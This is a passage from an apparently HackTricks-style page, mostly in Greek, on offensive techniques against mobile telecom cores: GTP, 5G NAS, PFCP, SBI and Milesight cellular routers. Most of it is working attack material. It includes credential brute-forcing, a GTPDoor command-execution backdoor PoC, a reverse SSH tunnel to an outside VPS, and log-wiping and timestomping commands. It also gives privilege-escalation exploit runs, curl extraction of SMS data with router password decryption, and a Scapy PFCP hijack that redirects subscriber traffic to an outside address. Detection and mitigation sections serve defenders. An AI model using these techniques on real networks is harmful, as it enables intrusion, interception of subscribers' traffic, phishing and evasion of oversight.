Εκμετάλλευση Δικτύων Τηλεπικοινωνιών (GTP / Roaming Environments)

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Note

Οι Mobile-core protocols (GPRS Tunnelling Protocol – GTP) συχνά διασχίζουν ημι-εμπιστευτικές GRX/IPX roaming backbones. Εφόσον μεταφέρονται πάνω από απλό UDP με σχεδόν καθόλου authentication, οποιοδήποτε foothold εντός της περιμέτρου ενός τηλεπικοινωνιακού οργανισμού συνήθως μπορεί να φτάσει απευθείας τα core signalling planes. Οι παρακάτω σημειώσεις συγκεντρώνουν offensive tricks που έχουν παρατηρηθεί in the wild εναντίον SGSN/GGSN, PGW/SGW και άλλων EPC nodes.

1. Αναγνώριση & Αρχική Πρόσβαση

1.1 Προεπιλεγμένοι λογαριασμοί OSS / NE

Ένα εκπληκτικά μεγάλο σύνολο vendor network elements παραδίδεται με hard-coded SSH/Telnet χρήστες όπως root:admin, dbadmin:dbadmin, cacti:cacti, ftpuser:ftpuser, … Μια εξειδικευμένη wordlist αυξάνει δραματικά την επιτυχία του brute-force:

hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt

Αν η συσκευή εκθέτει μόνο ένα management VRF, κάνε πρώτα pivot μέσω ενός jump host (βλ. ενότητα «SGSN Emu Tunnel» παρακάτω).

1.2 Ανακάλυψη hosts μέσα στο GRX/IPX

Οι περισσότεροι πάροχοι GRX εξακολουθούν να επιτρέπουν ICMP echo σε όλο το backbone. Συνδύασε το masscan με τις ενσωματωμένες gtpv1 UDP probes για να χαρτογραφήσεις γρήγορα τους GTP-C listeners:

masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55

2. Ανίχνευση Συνδρομητών – cordscan

Το παρακάτω εργαλείο Go κατασκευάζει πακέτα GTP-C Create PDP Context Request και καταγράφει τις απαντήσεις. Κάθε απάντηση αποκαλύπτει τον τρέχοντα SGSN / MME που εξυπηρετεί το ερωτηθέν IMSI και, μερικές φορές, το επισκεπτόμενο PLMN του συνδρομητή.

# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan

# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap

Βασικά flags:

  • --imsi IMSI του στοχευόμενου συνδρομητή
  • --oper Home / HNI (MCC+MNC)
  • -w Εγγραφή raw πακέτων σε pcap

Σημαντικές σταθερές μέσα στο binary μπορούν να τροποποιηθούν για να διευρύνουν τις σάρωσεις:

pingtimeout       = 3   // seconds before giving up
pco               = 0x218080
common_tcp_ports  = "22,23,80,443,8080"

3. Εκτέλεση Κώδικα πάνω από GTP – GTPDoor

GTPDoor είναι μια μικρή ELF υπηρεσία που binds UDP 2123 και parses κάθε εισερχόμενο GTP-C πακέτο. Όταν το payload ξεκινά με ένα pre-shared tag, το υπόλοιπο αποκρυπτογραφείται (AES-128-CBC) και εκτελείται μέσω /bin/sh -c. Το stdout/stderr εξάγονται μέσα σε μηνύματα Echo Response, έτσι ώστε να μην δημιουργηθεί ποτέ εξωτερική συνεδρία.

Ελάχιστο PoC πακέτο (Python):

import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))

Ανίχνευση:

  • οποιοσδήποτε host που στέλνει unbalanced Echo Requests προς διευθύνσεις IP του SGSN
  • GTP version flag ορισμένη σε 1 ενώ message type = 1 (Echo) – απόκλιση από τις προδιαγραφές

4. Pivoting μέσω του Core

4.1 sgsnemu + SOCKS5

OsmoGGSN συνοδεύεται από έναν SGSN emulator ικανό να establish a PDP context towards a real GGSN/PGW. Μόλις συμφωνηθεί, το Linux αποκτά μια νέα διεπαφή tun0 προσπελάσιμη από το roaming peer.

sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 &   # internal SOCKS proxy

Με σωστό firewall hair-pinning, αυτή η σήραγγα παρακάμπτει signalling-only VLANs και σας οδηγεί απευθείας στο data plane.

4.2 SSH Reverse Tunnel over Port 53

Το DNS είναι σχεδόν πάντα ανοιχτό σε roaming υποδομές. Εκθέστε μια εσωτερική υπηρεσία SSH στο VPS σας που ακούει στη θύρα :53 και επιστρέψτε αργότερα από το σπίτι:

ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com

Ελέγξτε ότι GatewayPorts yes είναι ενεργοποιημένο στο VPS.

5. Κρυφά Κανάλια

ΚανάλιΜεταφοράΑποκωδικοποίησηΣημειώσεις
ICMP – EchoBackdoorICMP Echo Req/Rep4-byte key + 14-byte chunks (XOR)αυστηρά παθητικός listener, χωρίς εξερχόμενη κίνηση
DNS – NoDepDNSUDP 53XOR (key = funnyAndHappy) encoded in A-record octetsπαρακολουθεί για υποτομέα *.nodep
GTP – GTPDoorUDP 2123AES-128-CBC blob in private IEαναμιγνύεται με την νόμιμη GTP-C επικοινωνία

Όλα τα implants υλοποιούν watchdogs που timestomp τα binaries τους και επανεκκινούνται αν καταρρεύσουν.

6. Defense Evasion Cheatsheet

# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp

# Disable bash history
export HISTFILE=/dev/null

# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup   # hide from top/htop
printf '\0' > /proc/$$/comm    # appears as [kworker/1]

touch -r /usr/bin/time /usr/bin/chargen   # timestomp
setenforce 0                              # disable SELinux

7. Privilege Escalation σε Legacy NE

# DirtyCow – CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd

# PwnKit – CVE-2021-4034
python3 PwnKit.py

# Sudo Baron Samedit – CVE-2021-3156
python3 exploit_userspec.py

Συμβουλή καθαρισμού:

userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c

8. Εργαλειοθήκη

  • cordscan, GTPDoor, EchoBackdoor, NoDepDNS – προσαρμοσμένα εργαλεία που περιγράφονται σε προηγούμενες ενότητες.
  • FScan : σάρωση TCP στο intranet (fscan -p 22,80,443 10.0.0.0/24)
  • Responder : LLMNR/NBT-NS rogue WPAD
  • Microsocks + ProxyChains : ελαφρύ SOCKS5 pivoting
  • FRP (≥0.37) : διέλευση NAT / γεφύρωση πόρων

9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay

Η διαδικασία εγγραφής 5G τρέχει πάνω από NAS (Non-Access Stratum) και πάνω από NGAP. Μέχρι να ενεργοποιηθεί η ασφάλεια NAS μέσω Security Mode Command/Complete, τα αρχικά μηνύματα δεν είναι authenticated και όχι κρυπτογραφημένα. Αυτό το παράθυρο πριν από την ενεργοποίηση ασφάλειας επιτρέπει πολλαπλές επιθέσεις όταν μπορείτε να παρατηρήσετε ή να παραποιήσετε N2 traffic (π.χ. on-path μέσα στον core, rogue gNB, ή testbed).

Registration flow (simplified):

  • Registration Request: UE sends SUCI (encrypted SUPI) and capabilities.
  • Authentication: AMF/AUSF send RAND/AUTN; UE returns RES*.
  • Security Mode Command/Complete: NAS integrity and ciphering are negotiated and activated.
  • PDU Session Establishment: IP/QoS setup.

Συμβουλές ρύθμισης εργαστηρίου (μη-RF):

  • Core: Η προεπιλεγμένη ανάπτυξη του Open5GS αρκεί για να αναπαραχθούν οι ροές.
  • UE: simulator ή test UE; αποκωδικοποίηση με Wireshark.
  • Active tooling: 5GReplay (capture/modify/replay NAS within NGAP), Sni5Gect (sniff/patch/inject NAS on the fly without bringing up a full rogue gNB).
  • Χρήσιμα φίλτρα εμφάνισης στο Wireshark:
  • ngap.procedure_code == 15 (InitialUEMessage)
  • nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)

9.1 Identifier privacy: SUCI failures exposing SUPI/IMSI

Αναμενόμενο: Το UE/USIM πρέπει να μεταδίδει SUCI (SUPI κρυπτογραφημένο με το δημόσιο κλειδί του home-network). Η εύρεση ενός plaintext SUPI/IMSI στο Registration Request υποδεικνύει πρόβλημα απορρήτου που επιτρέπει επίμονο tracking των συνδρομητών.

Πώς να δοκιμάσετε:

  • Καταγράψτε το πρώτο μήνυμα NAS στο InitialUEMessage και επιθεωρήστε το Mobile Identity IE.
  • Γρήγοροι έλεγχοι στο Wireshark:
  • Πρέπει να αποκωδικοποιείται ως SUCI, όχι IMSI.
  • Παραδείγματα φίλτρων: nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci θα πρέπει να υπάρχουν· η απουσία τους σε συνδυασμό με την παρουσία του imsi υποδεικνύει leakage.

Τι να συλλέξετε:

  • MCC/MNC/MSIN αν είναι εκτεθειμένα; καταγράψτε ανά UE και παρακολουθήστε σε χρόνο/τοποθεσίες.

Αντιμετώπιση:

  • Επιβάλετε SUCI-only UEs/USIMs· ειδοποιείτε για οποιοδήποτε IMSI/SUPI στο αρχικό NAS.

9.2 Capability bidding-down to null algorithms (EEA0/EIA0)

Υπόβαθρο:

  • Το UE ανακοινώνει τα υποστηριζόμενα EEA (κρυπτογράφηση) και EIA (ακεραιότητα) στο UE Security Capability IE του Registration Request.
  • Συνηθισμένες αντιστοιχίσεις: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 είναι null algorithms.

Πρόβλημα:

  • Επειδή το Registration Request δεν έχει integrity protection, ένας on-path attacker μπορεί να μηδενίσει bits ικανοτήτων ώστε να εξαναγκάσει την επιλογή EEA0/EIA0 αργότερα κατά το Security Mode Command. Κάποια stacks λανθασμένα επιτρέπουν null algorithms εκτός emergency services.

Βήματα επίθεσης:

  • Intercept InitialUEMessage και τροποποιήστε το NAS UE Security Capability ώστε να ανακοινώνει μόνο EEA0/EIA0.
  • Με Sni5Gect, hook το NAS μήνυμα και αναπροσαρμόστε τα capability bits πριν το προωθήσετε.
  • Παρατηρήστε αν ο AMF αποδέχεται null ciphers/integrity και ολοκληρώνει το Security Mode με EEA0/EIA0.

Επαλήθευση/ορατότητα:

  • Στο Wireshark, επιβεβαιώστε τα επιλεγμένα algorithms μετά το Security Mode Command/Complete.
  • Παράδειγμα εξόδου παθητικού sniffer:
Encyrption in use [EEA0]
Integrity in use [EIA0, EIA1, EIA2]
SUPI (MCC+MNC+MSIN) 9997000000001

Μέτρα μετριασμού (υποχρεωτικά):

  • Configure AMF/policy to reject EEA0/EIA0 except where strictly mandated (e.g., emergency calls).
  • Prefer enforcing EEA2/EIA2 at minimum; log and alarm on any NAS security context that negotiates null algorithms.

9.3 Αναπαραγωγή του αρχικού Registration Request (pre-security NAS)

Επειδή το αρχικό NAS στερείται ακεραιότητας και επικαιρότητας, το καταγεγραμμένο InitialUEMessage+Registration Request μπορεί να αναπαραχθεί στο AMF.

Κανόνας PoC για το 5GReplay για προώθηση ταιριαστών αναπαραγωγών:

<beginning>
<property value="THEN"
property_id="101"
type_property="FORWARD"
description="Forward InitialUEMessage with Registration Request">

<!-- Trigger on NGAP InitialUEMessage (procedureCode == 15) -->
<event value="COMPUTE"
event_id="1"
description="Trigger: InitialUEMessage"
boolean_expression="ngap.procedure_code == 15"/>

<!-- Context match on NAS Registration Request (message_type == 65) -->
<event value="COMPUTE"
event_id="2"
description="Context: Registration Request"
boolean_expression="nas_5g.message_type == 65"/>

</property>
</beginning>

What to observe:

  • Whether AMF accepts the replay and proceeds to Authentication; lack of freshness/context validation indicates exposure.

Mitigations:

  • Enforce replay protection/context binding at AMF; rate-limit and correlate per-GNB/UE.

9.4 Tooling pointers (reproducible)

  • Open5GS: spin up an AMF/SMF/UPF to emulate core; observe N2 (NGAP) and NAS.
  • Wireshark: verify decodes of NGAP/NAS; apply the filters above to isolate Registration.
  • 5GReplay: capture a registration, then replay specific NGAP + NAS messages as per the rule.
  • Sni5Gect: live sniff/modify/inject NAS control-plane to coerce null algorithms or perturb authentication sequences.

9.5 Defensive checklist

  • Continuously inspect Registration Request for plaintext SUPI/IMSI; block offending devices/USIMs.
  • Reject EEA0/EIA0 except for narrowly defined emergency procedures; require at least EEA2/EIA2.
  • Detect rogue or misconfigured infrastructure: unauthorized gNB/AMF, unexpected N2 peers.
  • Alert on NAS security modes that result in null algorithms or frequent replays of InitialUEMessage.

10. Industrial Cellular Routers – Unauthenticated SMS API Abuse (Milesight UR5X/UR32/UR35/UR41) and Credential Recovery (CVE-2023-43261)

Η κατάχρηση εκτεθειμένων web APIs βιομηχανικών cellular routers επιτρέπει stealthy, carrier-origin smishing σε κλίμακα. Οι Milesight UR-series routers εκθέτουν ένα JSON-RPC–style endpoint στο /cgi. Όταν είναι λανθασμένα διαμορφωμένο, το API μπορεί να ερωτηθεί χωρίς authentication για να εμφανίσει την SMS inbox/outbox και, σε ορισμένες αναπτύξεις, να στείλει SMS.

Τυπικά unauthenticated requests (ίδια δομή για inbox/outbox):

POST /cgi HTTP/1.1
Host: <router>
Content-Type: application/json

{ "base": "query_outbox", "function": "query_outbox", "values": [ {"page":1,"per_page":50} ] }

{ "base": "query_inbox", "function": "query_inbox", "values": [ {"page":1,"per_page":50} ] }

Οι απαντήσεις περιλαμβάνουν πεδία όπως timestamp, content, phone_number (E.164) και status (success ή failed).

Επαναλαμβανόμενες αποστολές με failed στον ίδιο αριθμό είναι συχνά “capability checks” από τους επιτιθέμενους για να επαληθεύσουν ότι ένας router/SIM μπορεί να παραδώσει πριν το blasting.

Παράδειγμα curl για exfiltrate μεταδεδομένων SMS:

curl -sk -X POST http://<router>/cgi \
-H 'Content-Type: application/json' \
-d '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}'

Σημειώσεις για auth artifacts:

  • Μερική κίνηση μπορεί να περιλαμβάνει ένα auth cookie, αλλά ένα μεγάλο μέρος των εκτεθειμένων συσκευών αποκρίνεται χωρίς καμία authentication στα query_inbox/query_outbox όταν η management interface είναι Internet-facing.
  • Σε περιβάλλοντα που απαιτούν auth, previously-leaked credentials (βλ. παρακάτω) επαναφέρουν την πρόσβαση.

Διαδρομή ανάκτησης credentials – CVE-2023-43261:

  • Επηρεαζόμενες οικογένειες: UR5X, UR32L, UR32, UR35, UR41 (pre v35.3.0.7).
  • Πρόβλημα: web-served logs (π.χ., httpd.log) είναι προσβάσιμα χωρίς authentication κάτω από /lang/log/ και περιέχουν admin login events με το password κρυπτογραφημένο χρησιμοποιώντας ένα hardcoded AES key/IV που υπάρχει σε client-side JavaScript.
  • Πρακτική πρόσβαση και decrypt:
curl -sk http://<router>/lang/log/httpd.log | sed -n '1,200p'
# Look for entries like: {"username":"admin","password":"<base64>"}

Ελάχιστο Python για την αποκρυπτογράφηση leaked passwords (AES-128-CBC, hardcoded key/IV):

import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
KEY=b'1111111111111111'; IV=b'2222222222222222'
enc_b64='...'  # value from httpd.log
print(unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(enc_b64)), AES.block_size).decode())

Hunting and detection ideas (network):

  • Alert σε μη-εξουσιοδοτημένα POST /cgi των οποίων το JSON body περιέχει base/function ορισμένο σε query_inbox ή query_outbox.
  • Παρακολουθήστε επαναλαμβανόμενα POST /cgi bursts που ακολουθούνται από καταχωρήσεις status":"failed" σε πολλούς μοναδικούς αριθμούς από την ίδια source IP (capability testing).
  • Κάντε inventory των Internet-exposed Milesight routers; περιορίστε τη διαχείριση σε VPN; απενεργοποιήστε SMS features εκτός αν απαιτούνται; αναβαθμίστε σε ≥ v35.3.0.7; rotate credentials και ελέγξτε SMS logs για άγνωστες αποστολές.

Shodan/OSINT pivots (examples seen in the wild):

  • http.html:"rt_title" matches Milesight router panels.
  • Google dorking για exposed logs: "/lang/log/system" ext:log.

Operational impact: η χρήση νόμιμων carrier SIMs μέσα σε routers δίνει πολύ υψηλή SMS deliverability/credibility για phishing, ενώ η έκθεση inbox/outbox leaks ευαίσθητα metadata σε μεγάλη κλίμακα.

11. PFCP Session Hijack & GTP-U TEID Abuse

11.1 PFCP Session Modification to steal flows

If you can speak PFCP on N4 (e.g., from a mis-filtered GRX/IPX segment), craft a Session Modification Request that inserts a duplicate PDR ID but with a smaller Precedence and a FAR pointing to your host. Some UPFs (e.g., OAI-cn5g) apply the first matching PDR and never check for uniqueness, so the malicious PDR hijacks all subsequent packets of that PDU session to your sink.

Minimal Scapy PoC (assumes PFCP contrib is available and you know SEID/PDR IDs):

Scapy PFCP session hijack PoC ```python from scapy.all import * from scapy.contrib.pfcp import *

n4 = “10.10.20.5” # UPF N4 seid = 0x123456789abc pdr_id = 7 # existing PDR ID in session far_id = 77 # new malicious FAR

pkt = IP(dst=n4)/UDP(sport=8805,dport=8805)/PFCP( S=1, seid=seid, msg_type=MODIFICATION_REQUEST)/PFCPSessionModificationRequest( IE_list=[PDR(id=pdr_id, precedence=1, outer_header_removal=0, far_id=fid_identifier(far_id)), FAR(id=far_id, apply_action=0b10, # FORWARD forwarding_parameters=ForwardingParameters( outer_header_creation=OuterHeaderCreation( desc=0x0002, ipv4_address=“203.0.113.55”, teid=0xdeadbeef)))] ) send(pkt, verbose=False)

</details>

### 11.2 Έγχυση κίνησης χρήστη με spoofing TEIDs
Αν το uplink GTP-U από το backbone δεν είναι ACL’d, μπορείς να επαναπαίξεις/μαντέψεις **TEIDs** που φαίνονται στις κεφαλίδες GTP-U και να ενθυλακώσεις αυθαίρετο IP/TCP προς το peer του UE ή προς το Internet. Παράδειγμα κατασκευής:
```python
send(IP(dst="10.10.20.8")/UDP(dport=2152,sport=2152)/
GTP_U_Header(teid=0x7ffed00)/
IP(src="10.0.0.10",dst="1.1.1.1")/TCP(dport=443,flags="S"))

Συνδυάστε αυτό με passive sniffing σε N3/N6 για να μάθετε τα ενεργά TEIDs· πολλά PGW/UPF stacks αποδέχονται οποιαδήποτε uplink source μόλις το TEID ταιριάξει.

12. SBA/SBI Fuzzing & Cross-Service Token Attack (free5GC R17)

Το FivGeeFuzz (academic 2025) παράγει αυτόματα γραμματικές από 3GPP OpenAPI specs για να fuzz HTTP-based SBIs. Εναντίον του free5GC ανακάλυψε οκτώ bugs, συμπεριλαμβανομένης της Cross-Service Token abuse: ένα compromised NF obtains an access token για Service A και το επαναχρησιμοποιεί εναντίον του Service B επειδή οι audience/issuer έλεγχοι έλειπαν στο target NF.

Γρήγορη replay ιδέα (assuming you stole an NRF-issued token from any NF):

# Swap :authority to the victim NF and reuse the bearer token
curl -sk -H "Authorization: Bearer $TOKEN" \
-H "Host: smf.internal" \
https://smf.internal/nsmf-pdusession/v1/sm-contexts

Για να κάνετε fuzz αυτόματα με γραμματικές FivGeeFuzz:

python3 fivgeefuzz.py --nf nsmf-pdusession \
--target https://smf.internal \
--grammar grammars/nsmf-pdusession.json \
--token "$TOKEN" --threads 8 --max-cases 500

Παρακολουθήστε για 401/403 bypasses και crashes σε SMF/AMF pods; patched free5GC builds reject mismatched aud/iss.

Ιδέες Ανίχνευσης

  1. Οποιαδήποτε συσκευή εκτός από SGSN/GGSN που πραγματοποιεί Create PDP Context Requests.
  2. Μη-τυπικές θύρες (53, 80, 443) που λαμβάνουν SSH handshakes από εσωτερικές IP.
  3. Συχνά Echo Requests χωρίς αντίστοιχα Echo Responses – μπορεί να υποδεικνύουν GTPDoor beacons.
  4. Υψηλός ρυθμός ICMP echo-reply κίνησης με μεγάλα, μη μηδενικά πεδία identifier/sequence.
  5. 5G: InitialUEMessage που φέρει NAS Registration Requests επαναλαμβανόμενα από τα ίδια endpoints (replay signal).
  6. 5G: NAS Security Mode που διαπραγματεύεται EEA0/EIA0 εκτός πλαισίων έκτακτης ανάγκης.
  7. PFCP: Session Modification που φέρει διπλότυπα PDR IDs ή ξαφνική ανακατεύθυνση FAR σε off-net IPs.
  8. SBA: NRF εκδίδει tokens των οποίων το aud δεν ταιριάζει με το καλούμενο NF – ένδειξη Cross-Service Token replay.

References

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks